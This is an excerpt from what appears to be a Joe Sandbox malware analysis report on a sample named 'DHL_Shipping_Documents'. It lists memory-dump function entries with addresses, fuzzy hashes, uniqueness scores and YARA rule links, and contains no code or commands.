Opcode Fuzzy Hash: d1f48ece0e732a838d2ee998687cbb441db15a4a2b55df0c19f0577b415cf555
Instruction Fuzzy Hash: 0801F271640705AFD3315F56E80AF06BBE8FF51F50F01482EB2059F390C6B1D9418B94

Uniqueness

Uniqueness Score: -1.00%

Function 015548CF Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44b8b0f4246efb5e8bd719058bc6192b120cfbe132f51c0152d69c894e56d8f5
Instruction ID: 54520fbeb1c34891c5384827d949f4b153739380750ba0e47890a2d12bbc19b8
Opcode Fuzzy Hash: 44b8b0f4246efb5e8bd719058bc6192b120cfbe132f51c0152d69c894e56d8f5
Instruction Fuzzy Hash: F5018472B00342AFDB219F9DC9D0B5DBBF8BB54710F01042AEA049F201E7B0DA448790

Uniqueness

Uniqueness Score: -1.00%

Function 014D24E2 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87229bf20383c8130c26de14c13aa4e9ee0877b4c7ee03daf3d8528fe1622ff9
Instruction ID: 8541e5fe601b50da643544e7be90b394be2b058c2373aadc6ae0af4f9c2c7c33
Opcode Fuzzy Hash: 87229bf20383c8130c26de14c13aa4e9ee0877b4c7ee03daf3d8528fe1622ff9
Instruction Fuzzy Hash: B5F0F932641610BBCB329F569C64F177AA9EB94B50F00446EF6069B260C570DD01C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 015A600F Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fced6e3dcf6c96f045b4f6cd5b8a90321f598d8668744082b1dfcb016a9f2bbc
Instruction ID: b4649e1129633e04e23a45915785a8b5518fb41608a70496b1b93a5b734daecb
Opcode Fuzzy Hash: fced6e3dcf6c96f045b4f6cd5b8a90321f598d8668744082b1dfcb016a9f2bbc
Instruction Fuzzy Hash: E4018F71A0020AEFDB00DFAAD551AAEB7F8FF58704F10406AF900EB350D774DA018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 014CC2B0 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a23a74abeef7df39ca4d0782f059420ad1b22dcd26f2a249a84cb06136c79114
Instruction ID: 86f6ada3cf0b64ea46c5e151f7d5a3448bb0787767ece909ab662cb821579a5d
Opcode Fuzzy Hash: a23a74abeef7df39ca4d0782f059420ad1b22dcd26f2a249a84cb06136c79114
Instruction Fuzzy Hash: 29F0CD379405339BD77217DD4880B5766979FA5D61F15003FA50DAB660C970880356D4

Uniqueness

Uniqueness Score: -1.00%

Function 0150CA2F Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a56cea99ef02aaca4aae11d0f75805741166953b7075d87a6e80665c5fb27de5
Instruction ID: d53b60d55be74f13672e5f6c908a93100e8a17d366322c2532d427dc75829272
Opcode Fuzzy Hash: a56cea99ef02aaca4aae11d0f75805741166953b7075d87a6e80665c5fb27de5
Instruction Fuzzy Hash: 450181326006809BD723979EC808B5D7BD8FF92794F0980E6FE048F6B2D6B9D850C255

Uniqueness

Uniqueness Score: -1.00%

Function 01556080 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba705cbf2e88b9003aa8b0ac3fd2ac288a712e482d8a0904fe25344767349b15
Instruction ID: c8a3300e551c07cb114632d2c6aeb8e5baa54b638446870a0ca0371a4d66e4c7
Opcode Fuzzy Hash: ba705cbf2e88b9003aa8b0ac3fd2ac288a712e482d8a0904fe25344767349b15
Instruction Fuzzy Hash: 93F0127220005EBFDF019F95DD80DAF7BBDFB55298B114129BA1196170D631DD21A7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0155A180 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbaef04d7bbe62e0dd6aa278fc2235635ed85616d2c394b3b977d0a4a2cc0d05
Instruction ID: 474d47527f09dcfa5a1b5258fe89029d21f661c972e4a942e2873ca7cdbe4b5c
Opcode Fuzzy Hash: dbaef04d7bbe62e0dd6aa278fc2235635ed85616d2c394b3b977d0a4a2cc0d05
Instruction Fuzzy Hash: F7014936110159AFCF129E84DC50EDA7F66FB4C794F068216FE286A220C736D9B1EB90

Uniqueness

Uniqueness Score: -1.00%

Function 014CC090 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bd96c013666b338541f4e430dcc9869fd73791d12e583ff8178f9c25aa62753
Instruction ID: cdac2523bb2d4db272bc7ff5028451035c6714448c8bcd1005c4d8d5b17a9c5f
Opcode Fuzzy Hash: 9bd96c013666b338541f4e430dcc9869fd73791d12e583ff8178f9c25aa62753
Instruction Fuzzy Hash: 03F0F6B66442415BF364954A8850B233286E7E1A11F25846FEA098B7F1EA72D8028255

Uniqueness

Uniqueness Score: -1.00%

Function 0150651A Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdc3baa5463f05450509af20681b4f65c82333c36173707ed3cda6dcf6b6f571
Instruction ID: f7db386d48018814992391e4cba81f4d65d38c9124e25d54822f09295d2f85c1
Opcode Fuzzy Hash: fdc3baa5463f05450509af20681b4f65c82333c36173707ed3cda6dcf6b6f571
Instruction Fuzzy Hash: A9018170344A819FE3239BBDED48B293BE8BB51B44F480594BE119F6E6E779D4108214

Uniqueness

Uniqueness Score: -1.00%

Function 0157404C Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 548e8b2359586bb40306705b47108677909f946617a5d87c6ec45bbef7d0f657
Instruction ID: e1a0c1bddda91538dc853909b43f97e5349836a3ba2510bf00c30ba2f99bbb4c
Opcode Fuzzy Hash: 548e8b2359586bb40306705b47108677909f946617a5d87c6ec45bbef7d0f657
Instruction Fuzzy Hash: 38F0E235341A134BEB37AA3DA829B2FABA5BFE0A10B05482D9651CF690DF61CC41C380

Uniqueness

Uniqueness Score: -1.00%

Function 0155E542 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c120523c754b244b186910d3af31c0e7679e0169f9c167022f13391f4b2cbda
Instruction ID: 436ab9c24f071b9614f207f7c9cad846469cb8a8ad684dc159de6fd457fe8062
Opcode Fuzzy Hash: 0c120523c754b244b186910d3af31c0e7679e0169f9c167022f13391f4b2cbda
Instruction Fuzzy Hash: 55F0B4327006519BD7618E0DCCA1F1AF7B8FF94A60F19046ABA059F231E660ED01C790

Uniqueness

Uniqueness Score: -1.00%

Function 0155C56D Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44ed9fa4a3679d703fd1f82c65bfc0e1a15f4cf340d0db49f3360a646d620fd3
Instruction ID: da8a9537306c4597a6dea9ac341a42f68ec98144a9923fc5504f25748da010ea
Opcode Fuzzy Hash: 44ed9fa4a3679d703fd1f82c65bfc0e1a15f4cf340d0db49f3360a646d620fd3
Instruction Fuzzy Hash: FFF0FF702053009FC310EF28C402A1ABBE8FF98704F804A5BBC98DF384E638E900C782

Uniqueness

Uniqueness Score: -1.00%

Function 015589E0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f386cdbfccde87b38b31eae2b0322ee58eb80182ffb85d42269cf74ae961db95
Instruction ID: 7c1cb115d8c22383b41b3bae4abb6b295c0c4496bbdc95ccceb2b5fd6470955b
Opcode Fuzzy Hash: f386cdbfccde87b38b31eae2b0322ee58eb80182ffb85d42269cf74ae961db95
Instruction Fuzzy Hash: 2EF096325101045FEB62AE5DD854E5AFBDAFB94764F4A041AFC552F12197706C81D780

Uniqueness

Uniqueness Score: -1.00%

Function 01500804 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 734e8b0c0a0faad5bcb5c72de31511e057a9fcf7f2f7f60ddcb1468402cbafb7
Instruction ID: 5ad3928a3e3e32d67b823f238fe3df6a23cd0ee8ba2c2ae5e8023eb82a5dec66
Opcode Fuzzy Hash: 734e8b0c0a0faad5bcb5c72de31511e057a9fcf7f2f7f60ddcb1468402cbafb7
Instruction Fuzzy Hash: 73F09072610204AAE715DB66CC05B56B7E9FFA8354F14847CA505DB1A0FAB1DE01C658

Uniqueness

Uniqueness Score: -1.00%

Function 0155C5E2 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24c19b7e672091dd9a9f991bfa0391cb5132de7f8eea4fbdcffc5c342cd5af3a
Instruction ID: 7aa3795eee7cea61f6a76290507387b092d6ab276960e143a3c06c3144bef2dc
Opcode Fuzzy Hash: 24c19b7e672091dd9a9f991bfa0391cb5132de7f8eea4fbdcffc5c342cd5af3a
Instruction Fuzzy Hash: 94F04F70A01249DFDB14EFA9D515A5EB7F8FF58704F00805AA906EB385D678EA01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 014D475B Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db65b8706e7ab1b70663544c0b0a210b073879c0ebb3ac2d8759085cbf546c98
Instruction ID: 5b51d4dde816da81ef1876b91ef444a5f27c8e336aedee0e4cea74c1c780f3f6
Opcode Fuzzy Hash: db65b8706e7ab1b70663544c0b0a210b073879c0ebb3ac2d8759085cbf546c98
Instruction Fuzzy Hash: 12F090F59556959EEF32C398C028B577BD89B07620F0E4967D50587F72C274D880C251

Uniqueness

Uniqueness Score: -1.00%

Function 015125D9 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e78874bf520fe222bb7d54b418da7df1c96898a41e0560cae44803ed8fd049f5
Instruction ID: f5c20729610edf40bc917fd13170316653bb026a9312517f54847b9fd66d2b53
Opcode Fuzzy Hash: e78874bf520fe222bb7d54b418da7df1c96898a41e0560cae44803ed8fd049f5
Instruction Fuzzy Hash: 66E092323006016BE7129E5A8C84F4777ADEFD2714F140879B5045E192CDE29C0982A4

Uniqueness

Uniqueness Score: -1.00%

Function 0150C5AD Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 965675d8f80cbc8a9aacfb0afb81e69dfa036dabe071858308780108a9ab72ed
Instruction ID: f0d38f2176f970af255d4eeb558dedd583075ead7ba7277be78afb70f4f8eb43
Opcode Fuzzy Hash: 965675d8f80cbc8a9aacfb0afb81e69dfa036dabe071858308780108a9ab72ed
Instruction Fuzzy Hash: 67F097B9441A80DFE33783DCC008B2A7BC8BB07660F0883E2D406CF192CB31D882C240

Uniqueness

Uniqueness Score: -1.00%

Function 014D0670 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ef15f686623811b79a02044a117bd5fae1da9742ae0162ad481dd5488c45a48
Instruction ID: b93f7bb0ed957f27b69f693809bd62e03dddf11e96d319601c99c6e0ed8fb743
Opcode Fuzzy Hash: 0ef15f686623811b79a02044a117bd5fae1da9742ae0162ad481dd5488c45a48
Instruction Fuzzy Hash: 23F0ED36204351DBDF16DF16E050AA97BE4FB96360F10009AFC0A8F761EB71E882CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01504980 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
Instruction ID: bbdb6318923383c25d9a5dc0990f8df2414b585917e6c213da62db9ae011eba5
Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
Instruction Fuzzy Hash: 8CE09232244105ABD7226A998904B6A76E9FBD57A1F150C39E7408F280DB74D881D7D0

Uniqueness

Uniqueness Score: -1.00%

Function 014CEBC0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45dc955876c1569cff0b6f470bea9aa91977536fdc5ff892586067a38c5b2ccf
Instruction ID: 10af9981dd6bd72e15ef64cb1dc957538cee025a92fbe60411abc578cffae515
Opcode Fuzzy Hash: 45dc955876c1569cff0b6f470bea9aa91977536fdc5ff892586067a38c5b2ccf
Instruction Fuzzy Hash: 9EF0A03D104289AFEB65CB08C446F363FA9EB40B24F04802EF40A9A161DB74D980CB20

Uniqueness

Uniqueness Score: -1.00%

Function 0157645E Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31490471c9ed7e22574f40afc62e54394d39486a02b9d02e3aed526838e6ae54
Instruction ID: 8506ca0fdf36f519c0a638a7f9ee8f0f6ff9a1c434c8dbf812663afb99908d05
Opcode Fuzzy Hash: 31490471c9ed7e22574f40afc62e54394d39486a02b9d02e3aed526838e6ae54
Instruction Fuzzy Hash: 6EE0DF32640214BBEB21A799CD0AF9EBEBDEB90AA0F054499B600EB090D530EE00D290

Uniqueness

Uniqueness Score: -1.00%

Function 015A0580 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
Instruction ID: da316251faf8f259ee30bf177cd5344321af8d4c9ea35d665a67996f6cfaf5f1
Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
Instruction Fuzzy Hash: 50E09B315503508BCB15EA09C141A6BB7E8FFD7620F55806AE9454B751D675F842C690

Uniqueness

Uniqueness Score: -1.00%

Function 0158A116 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b77b395c293db6e357ef8bd01306c310111b97bd380be824b1590f8d3f7cdce
Instruction ID: 4fb0b19f81f5d3b3f801682d13a39e0e6db09c32a952ac910cfabfe37d98d4c4
Opcode Fuzzy Hash: 0b77b395c293db6e357ef8bd01306c310111b97bd380be824b1590f8d3f7cdce
Instruction Fuzzy Hash: C5E01231411612DFE737BF19C808B56BAE1FF60751F15486EE1962A5B0D775D8D0CA40

Uniqueness

Uniqueness Score: -1.00%

Function 014D2540 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7fe08fd7b6c29771857f923b8fda7b82c6430ccc7e22be867a618df49cf999a0
Instruction ID: aed6dd9ae4235f8bff7df27c4fa9af0f34c5c514eb29d463430a6bddb16e1842
Opcode Fuzzy Hash: 7fe08fd7b6c29771857f923b8fda7b82c6430ccc7e22be867a618df49cf999a0
Instruction Fuzzy Hash: 93E09232100A419FC722FF2ADC25F9A7B9AEF70361F11451AF1265B5A1CA70A910CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0150C9F8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c31c54c59d139499466a4e02d52d506c41fe2cc489e3899ae309c121b1addf6
Instruction ID: 3952fedfdebf4b397daafea77c6db56a5b602430bb36869ae01ae1979942a300
Opcode Fuzzy Hash: 2c31c54c59d139499466a4e02d52d506c41fe2cc489e3899ae309c121b1addf6
Instruction Fuzzy Hash: 36D02B324410306ECB33F6597C04FDB2A99FB55260F0608E5F505AF0A2D565CCC282D0

Uniqueness

Uniqueness Score: -1.00%

Function 014C81EB Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9450d22c062193ca0b96a6b6e499c594998d4001dd6880e2345fbd976773c583
Instruction ID: 4edae5d3961253be653dc15eae262669ef909343271274415df158327dc4f5b6
Opcode Fuzzy Hash: 9450d22c062193ca0b96a6b6e499c594998d4001dd6880e2345fbd976773c583
Instruction Fuzzy Hash: B4E08636140513DEDB332F19DC14F5176E2BB90B10F21082EF0450A1B58A749881DB44

Uniqueness

Uniqueness Score: -1.00%

Function 01508A50 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
Instruction ID: c5c349d7ed38ee6274ac03a5a321033d6cc76ece859faa4e7e53ce635eda8a6c
Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
Instruction Fuzzy Hash: AFE04F33511A1487C729DE58D511B6677A5FB45730B09462AA6134B780C574E544C794

Uniqueness

Uniqueness Score: -1.00%

Function 01586B90 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 060d296e8d26ecb49ad336c8a787268f93ccbb25a937a2f458a648f6d28e60a5
Instruction ID: 530fc3b5382d5d2b293e44c49be7322b4d9cf654227ed47dc5be45d56b301a7c
Opcode Fuzzy Hash: 060d296e8d26ecb49ad336c8a787268f93ccbb25a937a2f458a648f6d28e60a5
Instruction Fuzzy Hash: A0D02E2800C2C44AEB12A90800603B83F0AA782B0EF08A4ACC0850F702CB070883E26B

Uniqueness

Uniqueness Score: -1.00%

Function 01526A56 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd1601b32585a6b88d4c50b370c0e43dbe108416518bdd3820cde33c94733b90
Instruction ID: b330f74b743b677550869ede0137132b1860edd1bc9ab25148e675766f6ddbf4
Opcode Fuzzy Hash: cd1601b32585a6b88d4c50b370c0e43dbe108416518bdd3820cde33c94733b90
Instruction Fuzzy Hash: 15D01732501A509FC7329F1BEA04917BAF9FBD5A117050A6EA94683920C670A802CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 0150E55C Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7430d6abf8e822ce7d0cceab22562b8e40fbea7628dab3a24fd1f76fb763ba5
Instruction ID: 6abb1b9484e04a348bbffcf162b4dc8dc5dee60dc3b8853e929118e92e8974a7
Opcode Fuzzy Hash: a7430d6abf8e822ce7d0cceab22562b8e40fbea7628dab3a24fd1f76fb763ba5
Instruction Fuzzy Hash: 6CD05232204610ABCB22AA1CBC04BC372E8BB98726F02049AB1098B0A1C364AC818680

Uniqueness

Uniqueness Score: -1.00%

Function 0154E5C8 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 889ecd962d74d48fb7db4d9f0524f3cd8c69ff8a978b39ae2bcdf3542e760d84
Instruction ID: dd92b6c8e97942386df4fa20116f65ae4aa1b8e31a8d3f6d0b70bcc5e6dac3bc
Opcode Fuzzy Hash: 889ecd962d74d48fb7db4d9f0524f3cd8c69ff8a978b39ae2bcdf3542e760d84
Instruction Fuzzy Hash: 50E046359006809BDF12DB89CA40F8EBBB5FB50B00F150048A0086F221D638E900CB80

Uniqueness

Uniqueness Score: -1.00%

Function 014CA093 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae463c8ff6160db86dd4874a28af28f0b4fccee573810f5be71e83db8e6df9fa
Instruction ID: e3d99d70972a096d931a2f45a920d23c909f42f78aa804f07cb9f161931e7df0
Opcode Fuzzy Hash: ae463c8ff6160db86dd4874a28af28f0b4fccee573810f5be71e83db8e6df9fa
Instruction Fuzzy Hash: A4D0223220207097CF292E4A6D14F637944AB80E90F2A006E380A83921C0208C43C2E0

Uniqueness

Uniqueness Score: -1.00%

Function 0150A7F0 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe6f420c8954bc0958b1a80f287efa0bb0c35c3e1ce5ca883a36861f2092c533
Instruction ID: b40351870f156db096658ebe320ef00ccf752582ad3074cec456aa10e36651eb
Opcode Fuzzy Hash: fe6f420c8954bc0958b1a80f287efa0bb0c35c3e1ce5ca883a36861f2092c533
Instruction Fuzzy Hash: 30D022370D010CBBCB029F62CC02F903BA8E760B60F004020B5048B0B0CA3AE850C580

Uniqueness

Uniqueness Score: -1.00%

Function 0150C9E4 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 274c6da7c58d7318bd995d50fa3924c54ba859393b7c7061c65ef0c1c296511a
